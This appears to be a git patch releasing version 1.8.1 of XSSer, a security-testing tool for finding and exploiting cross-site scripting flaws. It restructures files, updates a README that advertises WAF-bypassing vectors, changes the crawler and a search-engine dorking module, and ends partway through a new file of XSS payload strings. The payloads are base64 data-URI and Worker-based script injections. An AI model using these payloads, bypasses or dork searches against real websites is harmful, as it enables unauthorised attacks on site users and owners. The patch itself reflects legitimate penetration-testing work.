From 808d1baebea2dac46818784bc9c9cd59cab55459 Mon Sep 17 00:00:00 2001
From: epsylon <epsylon@riseup.net>
Date: Fri, 20 Sep 2019 17:30:53 +0200
Subject: [PATCH] XSSer v1.8.1 - 'The Hive' release

---
 xsser/Makefile => Makefile                    |    2 +-
 README.md                                     |   74 +-
 {xsser/core => core}/__init__.py              |    6 +-
 {xsser/core => core}/crawler.py               |   95 +-
 {xsser/core => core}/curlcontrol.py           |   45 +-
 {xsser/core => core}/dork.py                  |   66 +-
 {xsser/core => core}/encdec.py                |    8 +-
 {xsser/core => core}/flashxss.py              |   14 +-
 core/fuzzing/DCP.py                           |   59 +
 {xsser/core => core}/fuzzing/DOM.py           |   15 +-
 {xsser/core => core}/fuzzing/HTTPsr.py        |   61 +-
 {xsser/core => core}/fuzzing/__init__.py      |    6 +-
 core/fuzzing/dorks.txt                        |   40 +
 {xsser/core => core}/fuzzing/heuristic.py     |   51 +-
 {xsser/core => core}/fuzzing/user-agents.txt  |    0
 core/fuzzing/vectors.py                       | 2612 ++++++++++++
 {xsser/core => core}/globalmap.py             |    6 +-
 {xsser/core => core}/gtkcontroller.py         |   34 +-
 {xsser/core => core}/imagexss.py              |   17 +-
 core/main.py                                  | 3522 +++++++++++++++++
 {xsser/core => core}/mozchecker.py            |    6 +-
 {xsser/core => core}/options.py               |  111 +-
 {xsser/core => core}/post/__init__.py         |    6 +-
 {xsser/core => core}/post/xml_exporter.py     |   68 +-
 {xsser/core => core}/randomip.py              |    6 +-
 {xsser/core => core}/reporter.py              |    6 +-
 {xsser/core => core}/threadpool.py            |   28 +-
 {xsser/core => core}/tokenhub.py              |    6 +-
 {xsser/core => core}/twsupport.py             |    6 +-
 {xsser/core => core}/update.py                |   19 +-
 doc/AUTHOR                                    |   41 +
 {xsser/doc => doc}/CHANGELOG                  |   37 +-
 {xsser/doc => doc}/COPYING                    |    0
 {xsser/doc => doc}/INSTALL                    |   34 +-
 {xsser/doc => doc}/MANIFESTO                  |    4 +-
 doc/README                                    |  350 ++
 {xsser/doc => doc}/requirements.txt           |    0
 {xsser/gtk => gtk}/docs/about.txt             |   36 +-
 gtk/docs/wizard0.txt                          |   16 +
 {xsser/gtk => gtk}/docs/wizard1.txt           |    4 +-
 {xsser/gtk => gtk}/docs/wizard2.txt           |    0
 {xsser/gtk => gtk}/docs/wizard3.txt           |    0
 {xsser/gtk => gtk}/docs/wizard4.txt           |    0
 {xsser/gtk => gtk}/docs/wizard5.txt           |    0
 {xsser/gtk => gtk}/docs/wizard6.txt           |    0
 {xsser/gtk => gtk}/images/world.png           |  Bin
 {xsser/gtk => gtk}/images/xsser.jpg           |  Bin
 {xsser/gtk => gtk}/images/xssericon_16x16.png |  Bin
 {xsser/gtk => gtk}/images/xssericon_24x24.png |  Bin
 {xsser/gtk => gtk}/images/xssericon_32x32.png |  Bin
 {xsser/gtk => gtk}/xsser.desktop              |    2 +-
 {xsser/gtk => gtk}/xsser.ui                   |   70 +-
 xsser/setup.py => setup.py                    |   12 +-
 xsser/xsser => xsser                          |    6 +-
 xsser/core/fuzzing/DCP.py                     |   55 -
 xsser/core/fuzzing/dorks.txt                  |   30 -
 xsser/core/fuzzing/vectors.py                 | 1145 ------
 xsser/core/main.py                            | 2700 -------------
 xsser/doc/AUTHOR                              |   17 -
 xsser/doc/README                              |  171 -
 xsser/gtk/docs/wizard0.txt                    |   16 -
 61 files changed, 7179 insertions(+), 4562 deletions(-)
 rename xsser/Makefile => Makefile (98%)
 rename {xsser/core => core}/__init__.py (84%)
 rename {xsser/core => core}/crawler.py (84%)
 rename {xsser/core => core}/curlcontrol.py (94%)
 rename {xsser/core => core}/dork.py (54%)
 rename {xsser/core => core}/encdec.py (96%)
 rename {xsser/core => core}/flashxss.py (80%)
 create mode 100644 core/fuzzing/DCP.py
 rename {xsser/core => core}/fuzzing/DOM.py (86%)
 rename {xsser/core => core}/fuzzing/HTTPsr.py (53%)
 rename {xsser/core => core}/fuzzing/__init__.py (84%)
 create mode 100644 core/fuzzing/dorks.txt
 rename {xsser/core => core}/fuzzing/heuristic.py (73%)
 rename {xsser/core => core}/fuzzing/user-agents.txt (100%)
 create mode 100644 core/fuzzing/vectors.py
 rename {xsser/core => core}/globalmap.py (99%)
 rename {xsser/core => core}/gtkcontroller.py (98%)
 mode change 100644 => 100755
 rename {xsser/core => core}/imagexss.py (85%)
 create mode 100644 core/main.py
 rename {xsser/core => core}/mozchecker.py (97%)
 rename {xsser/core => core}/options.py (74%)
 rename {xsser/core => core}/post/__init__.py (84%)
 rename {xsser/core => core}/post/xml_exporter.py (61%)
 rename {xsser/core => core}/randomip.py (91%)
 rename {xsser/core => core}/reporter.py (92%)
 rename {xsser/core => core}/threadpool.py (96%)
 rename {xsser/core => core}/tokenhub.py (96%)
 rename {xsser/core => core}/twsupport.py (98%)
 rename {xsser/core => core}/update.py (74%)
 create mode 100644 doc/AUTHOR
 rename {xsser/doc => doc}/CHANGELOG (74%)
 rename {xsser/doc => doc}/COPYING (100%)
 rename {xsser/doc => doc}/INSTALL (67%)
 rename {xsser/doc => doc}/MANIFESTO (94%)
 create mode 100644 doc/README
 rename {xsser/doc => doc}/requirements.txt (100%)
 rename {xsser/gtk => gtk}/docs/about.txt (85%)
 create mode 100644 gtk/docs/wizard0.txt
 rename {xsser/gtk => gtk}/docs/wizard1.txt (62%)
 rename {xsser/gtk => gtk}/docs/wizard2.txt (100%)
 rename {xsser/gtk => gtk}/docs/wizard3.txt (100%)
 rename {xsser/gtk => gtk}/docs/wizard4.txt (100%)
 rename {xsser/gtk => gtk}/docs/wizard5.txt (100%)
 rename {xsser/gtk => gtk}/docs/wizard6.txt (100%)
 rename {xsser/gtk => gtk}/images/world.png (100%)
 rename {xsser/gtk => gtk}/images/xsser.jpg (100%)
 rename {xsser/gtk => gtk}/images/xssericon_16x16.png (100%)
 rename {xsser/gtk => gtk}/images/xssericon_24x24.png (100%)
 rename {xsser/gtk => gtk}/images/xssericon_32x32.png (100%)
 rename {xsser/gtk => gtk}/xsser.desktop (95%)
 rename {xsser/gtk => gtk}/xsser.ui (98%)
 mode change 100644 => 100755
 rename xsser/setup.py => setup.py (92%)
 rename xsser/xsser => xsser (89%)
 delete mode 100644 xsser/core/fuzzing/DCP.py
 delete mode 100644 xsser/core/fuzzing/dorks.txt
 delete mode 100644 xsser/core/fuzzing/vectors.py
 delete mode 100644 xsser/core/main.py
 delete mode 100644 xsser/doc/AUTHOR
 delete mode 100644 xsser/doc/README
 delete mode 100644 xsser/gtk/docs/wizard0.txt

diff --git a/xsser/Makefile b/Makefile
similarity index 98%
rename from xsser/Makefile
rename to Makefile
index a077094..eeb079f 100644
--- a/xsser/Makefile
+++ b/Makefile
@@ -4,7 +4,7 @@ PYTHON=`which python`
 DESTDIR=/
 BUILDIR=$(CURDIR)/debian/xsser
 PROJECT=xsser
-VERSION=0.7.0
+VERSION=1.8.1
 
 all:
 	@echo "make source - Create source package"
diff --git a/README.md b/README.md
index a7b3194..7654901 100644
--- a/README.md
+++ b/README.md
@@ -1,53 +1,77 @@
-  ![XSSer](https://xsser.03c8.net/xsser/zika1.png "XSSerBanner")
+  ![XSSer](https://xsser.03c8.net/xsser/thehive1.png "XSSer")
 
-=================================================================== 
+----------
 
- Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities.
+ + Web: https://xsser.03c8.net
 
 ----------
 
- XSSer is released under the GPLv3. You can find the full license text
-in the [COPYING](./xsser/doc/COPYING) file.
+  Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
 
-----------
+  It provides several options to try to bypass certain filters and various special techniques for code injection.
 
- + Web:  https://xsser.03c8.net
+  XSSer has pre-installed [ > 1300 XSS ] attacking vectors and can bypass-exploit code on several browsers/WAFs:
 
-----------
+     [PHPIDS]: PHP-IDS
+     [Imperva]: Imperva Incapsula WAF
+     [WebKnight]: WebKnight WAF
+     [F5]: F5 Big IP WAF
+     [Barracuda]: Barracuda WAF
+     [ModSec]: Mod-Security
+     [QuickDF]: QuickDefense
+     [Chrome]: Google Chrome
+     [IE]: Internet Explorer
+     [FF]: Mozilla's Gecko rendering engine, used by Firefox/Iceweasel
+     [NS-IE]: Netscape in IE rendering engine mode
+     [NS-G]: Netscape in the Gecko rendering engine mode
+     [Opera]: Opera 
 
-  ![XSSer](https://xsser.03c8.net/xsser/zika2.png "XSSerManifesto")
+  ![XSSer](https://xsser.03c8.net/xsser/url_generation.png "XSSer URL Generation Schema")
+
+----------
 
 #### Installing:
 
- XSSer runs on many platforms. It requires Python and the following libraries:
+  XSSer runs on many platforms. It requires Python and the following libraries:
 
-    - python-pycurl - Python bindings to libcurl
-    - python-xmlbuilder - create xml/(x)html files - Python 2.x
-    - python-beautifulsoup - error-tolerant HTML parser for Python
-    - python-geoip - Python bindings for the GeoIP IP-to-country resolver library
+      python-pycurl - Python bindings to libcurl
+      python-xmlbuilder - create xml/(x)html files - Python 2.x
+      python-beautifulsoup - error-tolerant HTML parser for Python
+      python-geoip - Python bindings for the GeoIP IP-to-country resolver library
 
- On Debian-based systems (ex: Ubuntu), run: 
+  On Debian-based systems (ex: Ubuntu), run: 
 
-    sudo apt-get install python-pycurl python-xmlbuilder python-beautifulsoup python-geoip
+      sudo apt-get install python-pycurl python-xmlbuilder python-beautifulsoup python-geoip
 
- On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run:
+  On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run:
 
-       pip install geoip 
+      pip install geoip 
 
 ####  Source libs:
 
-       * Python: https://www.python.org/downloads/
-       * PyCurl: http://pycurl.sourceforge.net/
-       * PyBeautifulSoup: https://pypi.python.org/pypi/BeautifulSoup
-       * PyGeoIP: https://pypi.python.org/pypi/GeoIP
+   * Python: https://www.python.org/downloads/
+   * PyCurl: http://pycurl.sourceforge.net/
+   * PyBeautifulSoup: https://pypi.python.org/pypi/BeautifulSoup
+   * PyGeoIP: https://pypi.python.org/pypi/GeoIP
+
+----------
+
+####  License:
+
+  XSSer is released under the GPLv3. You can find the full license text
+in the [LICENSE](./docs/LICENSE) file.
 
 ----------
 
 ####  Screenshots:
 
-  ![XSSer](https://xsser.03c8.net/xsser/url_generation.png "XSSerSchema")
+  ![XSSer](https://xsser.03c8.net/xsser/thehive2.png "XSSer Shell")
+
+  ![XSSer](https://xsser.03c8.net/xsser/thehive3.png "XSSer Manifesto")
+
+  ![XSSer](https://xsser.03c8.net/xsser/thehive4.png "XSSer Configuration")
 
-  ![XSSer](https://xsser.03c8.net/xsser/zika3.png "XSSerAdvanced")
+  ![XSSer](https://xsser.03c8.net/xsser/thehive5.png "XSSer Bypassers")
 
-  ![XSSer](https://xsser.03c8.net/xsser/zika4.png "XSSerGeoMap")
+  ![XSSer](https://xsser.03c8.net/xsser/zika4.png "XSSer GeoMap")
 
diff --git a/xsser/core/__init__.py b/core/__init__.py
similarity index 84%
rename from xsser/core/__init__.py
rename to core/__init__.py
index 192a90c..22a1b8e 100644
--- a/xsser/core/__init__.py
+++ b/core/__init__.py
@@ -1,9 +1,7 @@
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
diff --git a/xsser/core/crawler.py b/core/crawler.py
similarity index 84%
rename from xsser/core/crawler.py
rename to core/crawler.py
index 4646f96..8536599 100644
--- a/xsser/core/crawler.py
+++ b/core/crawler.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -40,14 +38,10 @@ class EmergencyLanding(Exception):
 class Crawler(object):
     """
     Crawler class.
-
-    Crawls a webpage looking for url arguments.
-    Dont call from several threads! You should create a new one
-    for every thread.
     """
     def __init__(self, parent, curlwrapper=None, crawled=None, pool=None):
         # verbose: 0-no printing, 1-prints dots, 2-prints full output
-        self.verbose = 1
+        self.verbose = 0
         self._parent = parent
         self._to_crawl = []
         self._parse_external = True
@@ -81,7 +75,10 @@ def _find_args(self, url):
         find parameters in given url.
         """
         parsed = urllib2.urlparse.urlparse(url)
-        qs = urlparse.parse_qs(parsed.query)
+        if "C=" in parsed.query and "O=" in  parsed.query:
+            qs = ""
+        else:
+            qs = urlparse.parse_qs(parsed.query)
         if parsed.scheme:
             path = parsed.scheme + "://" + parsed.netloc + parsed.path
         else:
@@ -92,6 +89,14 @@ def _find_args(self, url):
             if not zipped or not path in zipped[0]:
                 self._found_args[key].append([path, url])
                 self.generate_result(arg_name, path, url)
+        if not qs:
+            parsed = urllib2.urlparse.urlparse(url)
+            if path.endswith("/"):
+                attack_url = path + "XSS"
+            else:
+                attack_url = path + "/XSS"
+            if not attack_url in self._parent.crawled_urls:
+                self._parent.crawled_urls.append(attack_url)
         ncurrent = sum(map(lambda s: len(s), self._found_args.values()))
         if ncurrent >= self._max:
             self._armed = False
@@ -121,6 +126,7 @@ def crawl(self, path, depth=3, width=0, local_only=True):
         attack_urls = []
         if not self._parent._landing and self._armed:
             self._crawl(basepath, path, depth, width)
+            # now parse all found items
             if self._ownpool:
                 self.pool.dismissWorkers(len(self.pool.workers))
                 self.pool.joinAllDismissedWorkers()
@@ -138,7 +144,7 @@ def generate_result(self, arg_name, path, url):
         for key, val in qs.iteritems():
             qs_joint[key] = val[0]
         attack_qs = dict(qs_joint)
-        attack_qs[arg_name] = "VECTOR"
+        attack_qs[arg_name] = "XSS"
         attack_url = path + '?' + urllib.urlencode(attack_qs)
         if not attack_url in self._parent.crawled_urls:
             self._parent.crawled_urls.append(attack_url)
@@ -178,37 +184,35 @@ def _curl_main(self, pars):
         self._get_done(basepath, depth, width, path, res, c_info)
 
     def _get_error(self, request, error):
-        try:
-            path, depth, width, basepath = request.args[0]
-            e_type, e_value, e_tb = error
-            if e_type == pycurl.error:
-                errno, message = e_value.args
-                if errno == 28:
-                    print("requests pyerror -1")
-                    self.enqueue_jobs()
-                    self._requests.remove(path)
-                    return # timeout
-                else:
-                    self.report('crawler curl error: '+message+' ('+str(errno)+')')
-            elif e_type == EmergencyLanding:
-                pass
+        path, depth, width, basepath = request.args[0]
+        e_type, e_value, e_tb = error
+        if e_type == pycurl.error:
+            errno, message = e_value.args
+            if errno == 28:
+                print("requests pyerror -1")
+                self.enqueue_jobs()
+                self._requests.remove(path)
+                return # timeout
             else:
-                traceback.print_tb(e_tb)
-                self.report('crawler error: '+str(e_value)+' '+path)
-            if not e_type == EmergencyLanding:
-                for reporter in self._parent._reporters:
-                    reporter.mosquito_crashed(path, str(e_value))
-            self.enqueue_jobs()
-            self._requests.remove(path)
-        except:
-            return
+                self.report('crawler curl error: '+message+' ('+str(errno)+')')
+        elif e_type == EmergencyLanding:
+            pass
+        else:
+            traceback.print_tb(e_tb)
+            self.report('crawler error: '+str(e_value)+' '+path)
+        if not e_type == EmergencyLanding:
+            for reporter in self._parent._reporters:
+                reporter.mosquito_crashed(path, str(e_value))
+        self.enqueue_jobs()
+        self._requests.remove(path)
 
     def _emergency_parse(self, html_data, start=0):
         links = set()
         pos = 0
-        if not html_data:
-            return
-        data_len = len(html_data)
+        try:
+            data_len = len(html_data)
+        except:
+            data_len = html_data
         while pos < data_len:
             if len(links)+start > self._max:
                 break
@@ -236,7 +240,7 @@ def enqueue_jobs(self):
                 next_job = self._to_crawl.pop()
                 self._crawl(*next_job)
 
-    def _get_done(self, basepath, depth, width, path, html_data, content_type): # request, result):
+    def _get_done(self, basepath, depth, width, path, html_data, content_type):
         if not self._armed or len(self._parent.crawled_urls) >= self._max:
             raise EmergencyLanding
         try:
@@ -244,27 +248,23 @@ def _get_done(self, basepath, depth, width, path, html_data, content_type): # re
         except:
             encoding = None
         try:
-            soup = BeautifulSoup(html_data, from_encoding=encoding)
+            soup = BeautifulSoup(html_data, fromEncoding=encoding)
             links = None
         except:
             soup = None
             links = self._emergency_parse(html_data)
-
         for reporter in self._parent._reporters:
             reporter.start_crawl(path)
-
         if not links and soup:
-            links = soup.find_all('a')
-            forms = soup.find_all('form')
-
+            links = soup.findAll('a')
+            forms = soup.findAll('form')
             for form in forms:
                 pars = {}
                 if form.has_key("action"):
                     action_path = urlparse.urljoin(path, form["action"])
                 else:
                     action_path = path
-                for input_par in form.find_all('input'):
-
+                for input_par in form.findAll('input'):
                     if not input_par.has_key("name"):
                         continue
                     value = "foo"
@@ -284,8 +284,6 @@ def _get_done(self, basepath, depth, width, path, html_data, content_type): # re
         elif self.verbose:
             sys.stdout.write(".")
             sys.stdout.flush()
-        if not links:
-            return
         if len(links) > self._max:
             links = links[:self._max]
         for a in links:
@@ -323,7 +321,6 @@ def _check_url(self, basepath, path, href, depth, width):
             self._find_args(href)
             for reporter in self._parent._reporters:
                 reporter.add_link(path, href)
-            self.report("\n[Info] Spidering: " + str(href))
             if self._armed and depth>0:
                 if len(self._to_crawl) < self._max:
                     self._to_crawl.append([basepath, href, depth-1, width])
diff --git a/xsser/core/curlcontrol.py b/core/curlcontrol.py
similarity index 94%
rename from xsser/core/curlcontrol.py
rename to core/curlcontrol.py
index d8ed350..f414072 100644
--- a/xsser/core/curlcontrol.py
+++ b/core/curlcontrol.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -469,38 +467,37 @@ def print_options(cls):
         """
         Print selected options.
         """
-        print "\n[-]Verbose: active"
-        print "[-]Cookie:", cls.cookie
-        print "[-]HTTP User Agent:", cls.agent
-        print "[-]HTTP Referer:", cls.referer
-        print "[-]Extra HTTP Headers:", cls.headers
+        print "\nCookie:", cls.cookie
+        print "User Agent:", cls.agent
+        print "Referer:", cls.referer
+        print "Extra Headers:", cls.headers
         if cls.xforw == True:
-            print "[-]X-Forwarded-For:", "Random IP"
+            print "X-Forwarded-For:", "Random IP"
         else:
-            print "[-]X-Forwarded-For:", cls.xforw
+            print "X-Forwarded-For:", cls.xforw
         if cls.xclient == True:
-            print "[-]X-Client-IP:", "Random IP"
+            print "X-Client-IP:", "Random IP"
         else:
-            print "[-]X-Client-IP:", cls.xclient
-        print "[-]Authentication Type:", cls.atype
-        print "[-]Authentication Credentials:", cls.acred
+            print "X-Client-IP:", cls.xclient
+        print "Authentication Type:", cls.atype
+        print "Authentication Credentials:", cls.acred
         if cls.ignoreproxy == True:
-            print "[-]Proxy:", "Ignoring system default HTTP proxy"
+            print "Proxy:", "Ignoring system default HTTP proxy"
         else:
-            print "[-]Proxy:", cls.proxy
-        print "[-]Timeout:", cls.timeout
+            print "Proxy:", cls.proxy
+        print "Timeout:", cls.timeout
         if cls.tcp_nodelay == True:
-            print "[-]Delaying:", "TCP_NODELAY activate"
+            print "Delaying:", "TCP_NODELAY activate"
         else:
-            print "[-]Delaying:", cls.delay, "seconds"
+            print "Delaying:", cls.delay, "seconds"
         if cls.followred == True:
-            print "[-]Follow 302 code:", "active"
+            print "Follow 302 code:", "active"
             if cls.fli:
-                print"[-]Limit to follow:", cls.fli
+                print"Limit to follow:", cls.fli
         else:
-            print "[-]Delaying:", cls.delay, "seconds"
+            print "Delaying:", cls.delay, "seconds"
 
-        print "[-]Retries:", cls.retries, "\n"
+        print "Retries:", cls.retries, "\n"
 
     def answered(self, check):
         """
diff --git a/xsser/core/dork.py b/core/dork.py
similarity index 54%
rename from xsser/core/dork.py
rename to core/dork.py
index 0dc5ca8..9acb55f 100644
--- a/xsser/core/dork.py
+++ b/core/dork.py
@@ -2,9 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-This file is part of the xsser project, https://xsser.03c8.net
+This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,18 +22,22 @@
 
 List of search engines: http://en.wikipedia.org/wiki/List_of_search_engines
 
+Currently supported: duck(default), startpage, yahoo, bing
+
 """
-import urllib2, traceback, re, random
+import urllib2, traceback, re, random, urllib
 urllib2.socket.setdefaulttimeout(5.0)
 
 DEBUG = 0
 
 class Dorker(object):
-    def __init__(self, engine='yahoo'):
+    def __init__(self, engine='duck'):
         self._engine = engine
         self.search_engines = [] # available dorking search engines
-        self.search_engines.append('bing')
+        self.search_engines.append('duck')
+        self.search_engines.append('startpage')
         self.search_engines.append('yahoo')
+        self.search_engines.append('bing')
         self.agents = [] # user-agents
         try:
             f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
@@ -46,35 +50,57 @@ def dork(self, search):
         """
         Perform a search and return links.
         """
-        if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018
-            search_url = 'https://www.bing.com/search?q="' + search + '"'
-        elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018
-            search_url = 'https://search.yahoo.com/search?q="' + search + '"'
+        if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018 -> 26-08-2019
+            search_url = 'https://www.bing.com/search?q="' + str(search) + '"'
+            print "\nSearching query:", urllib2.unquote(search_url)
+        elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018 -> 26-08-2019
+            search_url = 'https://search.yahoo.com/search?q="' + str(search) + '"'
+            print "\nSearching query:", urllib2.unquote(search_url)
+        elif self._engine == 'duck': # works at 26-08-2019
+            search_url = 'https://duckduckgo.com/html/' 
+            q = 'instreamset:(url):"' + str(search) + '"' # set query to search literally on results
+            query_string = { 'q':q }
+            print "\nSearching query:", urllib2.unquote(search_url) + " [POST: (" + q + ")]"
+        elif self._engine == 'startpage': # works at 26-08-2019
+            search_url = 'https://www.startpage.com/do/asearch'
+            q = 'url:"' + str(search) + '"' # set query to search literally on results
+            query_string = { 'cmd':'process_search', 'query':q }
+            print "\nSearching query:", urllib2.unquote(search_url) + " [POST: (" + q + ")]"
         else:
-            print "\n[Error] This search engine is not supported!\n" 
-            print "[Info] List of available:"
-            print '-'*25
+            print "\n[Error] This search engine is not being supported!\n"
+            print '-'*25 
+            print "\n[Info] Use one from this list:\n"
             for e in self.search_engines:
                 print "+ "+e
-            print ""
+            print "\n ex: xsser -d 'profile.asp?num=' --De 'duck'"
+            print " ex: xsser -l --De 'startpage'"
+            print "\n[Info] Or try them all:\n\n ex: xsser -d 'news.php?id=' --Da\n"
         try:
             self.search_url = search_url
-            print "\n[Info] Search query:", urllib2.unquote(search_url)
             user_agent = random.choice(self.agents).strip() # set random user-agent
             referer = '127.0.0.1' # set referer to localhost / WAF black magic!
             headers = {'User-Agent' : user_agent, 'Referer' : referer}
-            req = urllib2.Request(search_url, None, headers)
+            if self._engine == 'bing' or self._engine == 'yahoo': # using GET
+                req = urllib2.Request(search_url, None, headers)
+            elif self._engine == 'duck' or self._engine == 'startpage': # using POST
+                data = urllib.urlencode(query_string)
+                req = urllib2.Request(search_url, data, headers)
             html_data = urllib2.urlopen(req).read()
             print "\n[Info] Retrieving requested info..."
         except urllib2.URLError, e:
             if DEBUG:
                 traceback.print_exc()
             print "\n[Error] Cannot connect!"
+            print "\n" + "-"*50
             return
         if self._engine == 'bing':
-            regex = '<h2><a href="(.+?)" h=' # regex magics 09-04/2018
+            regex = '<h2><a href="(.+?)" h=' # regex magics 08/2019
         if self._engine == 'yahoo':
-            regex = 'RU=(.+?)/RK=' # regex magics [09/04/2018]
+            regex = 'RU=(.+?)/RK=' # regex magics 08/2019
+        if self._engine == 'duck':
+            regex = '<a class="result__url" href="(.+?)">' # regex 08/2019
+        if self._engine == 'startpage':
+            regex = 'target="_blank">(.+?)</a>' # regex magics 08/2019
         pattern = re.compile(regex)
         links = re.findall(pattern, html_data)
         found_links = []
@@ -90,14 +116,14 @@ def dork(self, search):
                     if link2 not in found_links: # parse that target is not duplicated
                         found_links.append(link)
         else:
-            print "\n[Info] Not any link found for that query!"
+            print "\n[Error] Not any link found for that query!"
         return found_links
 
 if __name__ == '__main__':
-    for a in ['yahoo', 'bing']:
+    for a in ['bing', 'yahoo', 'duck', 'startpage']: # working at: 28/08/2019
         dork = Dorker(a)
         res = dork.dork("news.php?id=")
         if res:
-            print "[+]", a, ":", len(res), "\n"
+            print "\n[+] Search Engine:", a, "| Found: ", len(res), "\n"
             for b in res:
                 print " *", b
diff --git a/xsser/core/encdec.py b/core/encdec.py
similarity index 96%
rename from xsser/core/encdec.py
rename to core/encdec.py
index 8e71733..91a6f6e 100644
--- a/xsser/core/encdec.py
+++ b/core/encdec.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -102,7 +100,7 @@ def _ipDwordEncode(self, string):
     def _ipOctalEncode(self, string):
         """
         Encode to octal.
-	"""
+    	"""
         encoded=''
         tblIP = string.split('.')
         # In the case it's not an IP
diff --git a/xsser/core/flashxss.py b/core/flashxss.py
similarity index 80%
rename from xsser/core/flashxss.py
rename to core/flashxss.py
index 01eadf5..6bb384a 100644
--- a/xsser/core/flashxss.py
+++ b/core/flashxss.py
@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -30,8 +28,8 @@ def __init__(self, payload =''):
 
     def flash_xss(self, filename, payload):
         """
-        Create -fake- flash movie (.swf) with code XSS injected.
-	"""
+        Create -fake- flash movie (.swf) with XSS codeinjected.
+	    """
         root, ext = os.path.splitext(filename)
         if ext.lower() in [".swf"]:
             f = open(filename, 'wb')
@@ -42,9 +40,9 @@ def flash_xss(self, filename, payload):
                 content = user_payload
             f.write(content)
             f.close()
-            flash_results = "\nCode: "+ content + "\nFile: ", root + ext
+            flash_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n"
         else:
-            flash_results = "\nPlease select a filename with extension .swf"
+            flash_results = "\n[Error] Supported extensions = .swf\n"
         return flash_results
 
 if __name__ == '__main__':
diff --git a/core/fuzzing/DCP.py b/core/fuzzing/DCP.py
new file mode 100644
index 0000000..dd44f04
--- /dev/null
+++ b/core/fuzzing/DCP.py
@@ -0,0 +1,59 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+This file is part of the XSSer project, https://xsser.03c8.net
+
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+## This file contains different XSS fuzzing vectors.
+## If you have some new, please email me to [epsylon@riseup.net]
+## Happy Cross Hacking! ;)
+
+DCPvectors = [
+		{ 'payload' : """<a href="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></a>[B64]""",
+          'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<iframe src="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></[B64]""",
+		  'browser' : """[Data Control Protocol Injection]"""},	
+		{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]'))""",
+		  'browser' : """[Data Control Protocol Injection]"""},
+		{ 'payload' : """<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"&#09;&#10;&#11;>Y</a""",
+		  'browser' : """[Data Control Protocol Injection]"""},
